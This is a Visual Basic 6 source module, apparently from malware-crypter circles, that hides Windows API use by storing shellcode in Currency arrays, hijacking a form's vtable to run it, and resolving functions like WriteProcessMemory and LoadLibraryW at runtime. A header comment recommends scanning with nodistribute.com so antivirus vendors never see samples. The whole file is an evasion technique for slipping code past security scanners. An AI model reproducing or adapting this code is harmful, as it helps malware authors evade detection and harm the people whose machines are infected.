Option Explicit
'---------------------------------------------------------------------------------------
' Don't use VirusTotal, use http://nodistribute.com instead
'
' Module : NewMisery (Im horrible for names...)
' Author : Misery (Miseryk) Inspired by OXYMORON
' Date : 17/07/2014 (Start) | 15/09/2014 (End)
' Purpose : 0 API
'---------------------------------------------------------------------------------------
Public KernelBase As Long
Public Base As Long 'With no use, just test
Public BkAddVal As Long '[Me.Point(8@)] backup => CALL [EAX+2D0]
Public User32 As Long
Private Sub Initialize()
Call Karcrack.Initialize
End Sub
Public Function GetFuncAddr(ByVal lAddr As Long) As Long
GetFuncAddr = lAddr
End Function
Public Sub Init(ByVal vForm As Form)
Call Initialize
Dim ASM_c(7) As Currency
ASM_c(0) = 259535234953094.8442@
ASM_c(1) = 350419256390428.4982@
ASM_c(2) = 465082451153964.2368@
ASM_c(3) = 117108873756465.8452@
ASM_c(4) = 64246993287716.5497@
ASM_c(5) = -518518030442266.1493@
ASM_c(6) = -30494267.8016@
ASM_c(7) = -801556291178923.7505@
BkAddVal = Karcrack.GetDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0)
Call Karcrack.PutDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0, VarPtr(ASM_c(0)))
Call vForm.Point(VarPtr(KernelBase), VarPtr(Base))
Call Karcrack.PutDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0, BkAddVal)
Call Patch(vForm)
End Sub
Private Sub Patch(ByVal vForm As Form)
Dim ASM_c(5) As Currency
ASM_c(0) = 537140736891580.1227@
ASM_c(1) = 583913078498908.8528@
ASM_c(2) = -854952546922381.2279@
ASM_c(3) = -841638429847924.6252@
ASM_c(4) = -116134715448543.5308@
ASM_c(5) = -802975980578020.9409@
Dim Address As Long
Address = NewMisery.GetFuncAddr(AddressOf CallAPI) + 11
Dim MyPushes(6) As Long
MyPushes(0) = VarPtr(0)
MyPushes(1) = 51
MyPushes(2) = VarPtr(ASM_c(0))
MyPushes(3) = Address
MyPushes(4) = -1
MyPushes(5) = KernelBase
MyPushes(6) = NewMisery.FunctionAddress(vForm, "WriteProcessMemory")
Dim ASM_c2(6) As Currency
ASM_c2(0) = -856471559609067.0246@
ASM_c2(1) = 367493325241674.242@
ASM_c2(2) = 828635112938277.7599@
ASM_c2(3) = -842503583785949.618@
ASM_c2(4) = 5202119258820.4106@
ASM_c2(5) = -119118.2336@
ASM_c2(6) = -802970373083417.7606@
BkAddVal = Karcrack.GetDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0)
Call Karcrack.PutDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0, VarPtr(ASM_c2(0)))
Call vForm.Point(VarPtr(MyPushes(0)), 0)
Call Karcrack.PutDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0, BkAddVal)
End Sub
Public Function ConvertToMisery(ByVal vForm As Form, ByVal AddressSrc As Long, ByVal AddressDst As Long) As Long
Dim c_ASM(2) As Long
c_ASM(0) = -64731961
c_ASM(1) = AddressSrc
c_ASM(2) = -64723713
ConvertToMisery = NewMisery.CallAPI(NewMisery.FunctionAddress(vForm, "WriteProcessMemory"), VarPtr(-1), AddressDst, VarPtr(VarPtr(c_ASM(0))), VarPtr(12), VarPtr(VarPtr(0)))
End Function
Public Function CallAPI(ByVal Address As Long, ParamArray vParams() As Variant) As Long
Address = KernelBase + Address
DoEvents: DoEvents: DoEvents
DoEvents: DoEvents: DoEvents
DoEvents: DoEvents: DoEvents
DoEvents: DoEvents: DoEvents
DoEvents: DoEvents: DoEvents
DoEvents: DoEvents: DoEvents
End Function
Public Function MyCallWindowProcA(ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
DoEvents
DoEvents
End Function
Public Function MyGetProcAddress(ByVal hModule As Long, ByVal lpProcName As String) As Long
DoEvents
DoEvents
End Function
Public Function FunctionAddress(ByVal vForm As Form, ByVal StrFunction As String) As Long
Dim strFunc() As Byte
Dim Offset As Long
Dim ASM_c(19) As Currency
ASM_c(0) = 814232361510246.7936@
ASM_c(1) = 350419227990245.6828@
ASM_c(2) = 465082451153964.2368@
ASM_c(3) = 117108873756465.8452@
ASM_c(4) = 461280767645907.9819@
ASM_c(5) = -459709328520114.7076@
ASM_c(6) = -118880.7541@
ASM_c(7) = -835887271382144.2318@
ASM_c(8) = 886420572523377.9787@
ASM_c(9) = 839808409003602.7148@
ASM_c(10) = 840567380577989.5332@
ASM_c(11) = -100852514478035.1214@
ASM_c(12) = -428637109111001.2498@
ASM_c(13) = -64280619725626.29@
ASM_c(14) = -273730417291300.9967@
ASM_c(15) = 204338008016006.1199@
ASM_c(16) = -854998653806026.0861@
ASM_c(17) = -511608917668079.9976@
ASM_c(18) = 190267051.2127@
ASM_c(19) = -802975918745080.576@
BkAddVal = Karcrack.GetDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0)
Call Karcrack.PutDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0, VarPtr(ASM_c(0)))
strFunc = StrConv(StrFunction & Chr(0), vbFromUnicode)
Call vForm.Point(VarPtr(Offset), VarPtr(strFunc(0)))
Call Karcrack.PutDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0, BkAddVal)
FunctionAddress = Offset
End Function
Public Sub GetUser32(ByVal vForm As Form)
Dim LoadLibrary As Long
Dim ASM_c(9) As Currency
LoadLibrary = NewMisery.FunctionAddress(vForm, "LoadLibraryW")
LoadLibrary = LoadLibrary + KernelBase
ASM_c(0) = 814232361510246.7936@
ASM_c(1) = 100060056.7804@
ASM_c(2) = 497206524950976.384@
ASM_c(3) = 331470430218173.2864@
ASM_c(4) = 8356415879.68@
ASM_c(5) = -840821747844015.7184@
ASM_c(6) = 654401063636671.802@
ASM_c(7) = 79190153.865@
ASM_c(8) = 12469341468280.2432@
ASM_c(9) = -802991806362733.7728@
BkAddVal = Karcrack.GetDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0)
Call Karcrack.PutDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0, VarPtr(ASM_c(0)))
Call vForm.Point(VarPtr(User32), VarPtr(LoadLibrary))
Call Karcrack.PutDWord(Karcrack.GetDWord(ObjPtr(vForm)) + &H2D0, BkAddVal)
End Sub